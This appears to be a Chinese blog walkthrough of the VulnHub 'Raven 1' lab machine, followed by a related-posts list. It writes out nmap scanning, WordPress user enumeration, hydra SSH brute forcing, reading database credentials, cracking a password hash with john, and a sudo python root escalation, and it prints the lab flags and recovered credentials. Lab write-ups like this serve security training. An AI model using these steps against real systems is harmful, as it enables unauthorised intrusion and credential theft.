15-VulnHub-Raven 1
vulnhub-Rave: 1
靶机地址:https://www.vulnhub.com/entry/raven-1,256/
目标:找到四个flag.txt信息
作者:尼德霍格007
时间:2021-8-7
一、信息收集
nmap扫描存活主机
nmap -sP 192.168.21.0/24
扫描端口开放情况
nmap -A -p- 192.168.21.150
看到目标主机开放了这几个端口
先访问一下web
在service的源码中发现了第一个flag
flag1{b9bbcb33e11b80be759c4e844862482d}
然后点进BLOG发现用的是wordpress
二、获取shell
探测WordPress的漏洞,可以直接使用kali自带的WPscan,先暴力枚举用户名
wpscan --url http://192.168.137.142/wordpress/ -eu
发现了两个用户michael和steven
保存为user.txt
直接上九头蛇使用自身密码库进行暴力破解
hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.137.142
获得账户michael和michael
ssh登陆
ssh michael@192.168.21.150
三、提权
进来之后进入网站根目录
cd /var/www
发现flag2
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
之前我们发现网站是用WordPress搭建的,我们再去找找相关的配置文件
在配置文件中找到了数据库的账户和密码
进mysql看看
mysql -uroot -p
选择wordpress库
在wp_posts表中发现了flag3和flag4
select * from wp_posts;
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
4个flag已经全部得到,本来到这里应该结束了,但是我们没有获取到rot权限,所以继续渗透
继续查看其他表
发现wp_users表中有steven的密码hash
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
使用john破解一下
先把steven的密码hash保存为txt文件
然后使用john破解,得到密码是pink84
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
然后我们使用steven登录
之后使用sudo+python命令的方式提权
sudo python -c 'import pty;pty.spawn("/bin/bash")'
进入/root目录查看flag4.txt,到此就结束了。
四、总结
因为之前打过Raven:2的靶机,所以这次做得比较顺利,主要是几种工具要熟练使用。
15-VulnHub-Raven 1相关推荐
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- Vulnhub系列:Raven 1
该篇为Vulnhub系列靶机渗透,本次靶机存在4个flag.下面开始我们今天的渗透之旅.Raven靶机有很多种思路,我将对其进行一一整理. 首先进行信息收集,利用arp-scan和nmap,进行靶机的 ...
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
- 【Vulnhub】之JIS-CTF-VulnUpload-CTF01
一. 部署方法 在官网上下载靶机ova环境:http://www.mediafire.com/file/t5b4nkynxkm9hj2/CTF01.ova 使用VMware搭建靶机环境 攻击机使用VM ...
- vulnhub刷题记录(The Planets: Earth)
英文名称:The Planets: Earth 中文名称:行星:地球 发布日期:2021 年 11 月 2 日 难度:简单 描述:地球是一个简单的盒子,尽管您可能会发现它比本系列中的"水星& ...
- vulnhub 靶机渗透:Stapler
Stapler nmap扫描 21 端口 22 53端口 80端口 目录爆破 139端口 666 端口 3306端口 12380端口 获取数据库root权限 获取系统立足点 提权 其他思路 系统立足点 ...
- Vulnhub 靶机测试NO.30 hacksudo FOG
hacksudo FOG hacksudo FOG渗透测试 1 环境准备 2 测试过程 2.1 nmap 扫描端口 2.2 测试思路 2.3 浏览80 2.4 gobuster目录枚举 2.5 查看c ...
- vulnhub靶机练习-Os-hackNos-1
今天带来的靶机是 vulnhub Os-hackNos-1 先看一下简介: 难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt 0.靶机简介: D ...
- Hacker_kid-v1.0.1(vulnhub)
中等难度的靶机,取得权限即可(提示:信息收集,不需要爆破) 此靶机存在的都是新兴的漏洞类型. 地址如下: https://download.vulnhub.com/hackerkid/Hacker_K ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
最新文章
- javaScript由哪些部分组成?
- sbt構建一個spark工程(scala+spark+sbt)
- QuartZ.net 常用配置说明
- 对IplImage 结构体的理解
- Git(2):安装和使用
- 新文速递 | 盒装数据:一种基于数据盒的数据产品形态
- WEB标准有什么好处?
- java.util.zip.ZipException: only DEFLATED entries can have EXT descriptor
- 初识Java反序列化
- 财务管理流程图怎么画之你需要了解的流程图绘制技巧
- Markdown中给图片增加超链接
- 问卷星不能复制粘贴?不存在的!
- PA 调试心得(一个电容引发的问题)
- [JMeter性能测试实战]之先从搭建测试环境开始
- vue下载大文件时浏览器不显示下载进度
- Zookeeper连接异常 Got ping response for sessionid 2021-06-30
- RARP协议的使用场景
- windows10 更换密码
- 标普500市值门槛提高今日生效 第一太阳能(First Solar)出局
- 计算机网口在哪看,打印机端口从哪里看,怎么设置?-电脑自学网